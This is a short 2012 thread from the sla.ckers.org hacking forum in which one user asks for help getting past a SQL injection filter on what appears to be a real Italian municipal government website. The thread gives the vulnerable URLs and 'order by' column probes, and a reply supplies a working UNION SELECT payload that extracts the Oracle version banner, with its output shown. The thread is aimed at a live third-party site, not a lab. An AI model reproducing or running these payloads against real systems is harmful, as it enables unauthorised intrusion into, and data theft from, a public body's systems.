SQL Inj Hard Filter [Solved]

sla.ckers.org is
ha.ckers sla.cking

How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

SQL Inj Hard Filter [Solved]

Posted by: Nerder

Date: March 30, 2012 04:01AM

This is the vulnerable variable:

www.comune.taranto.it/servizi/pagina.php?id=11238

I have tried many ways to bypassing filter, but none have been successful.

the columns are 6:

http://www.comune.taranto.it/servizi/pagina.php?id=1123+order+by+6-- [true]
http://www.comune.taranto.it/servizi/pagina.php?id=1123+order+by+7-- [false]

Help me Pls.
Nerder

Edited 1 time(s). Last edit at 04/07/2012 10:11AM by Nerder.

Options: Reply•Quote

Re: SQL Inj Hard Filter

Posted by: Razor4x

Date: March 30, 2012 04:01PM

http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122%20union%20select%20NULL,banner,NULL,NULL,NULL,NULL%20from%20v$version--

CORE 9.2.0.6.0 Production
basi oracle sqli

Options: Reply•Quote

Re: SQL Inj Hard Filter

Posted by: Nerder

Date: April 07, 2012 10:11AM

Thx a Lot, I Dunno a lot of thing about Sql Injection in Opera DBMS.

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login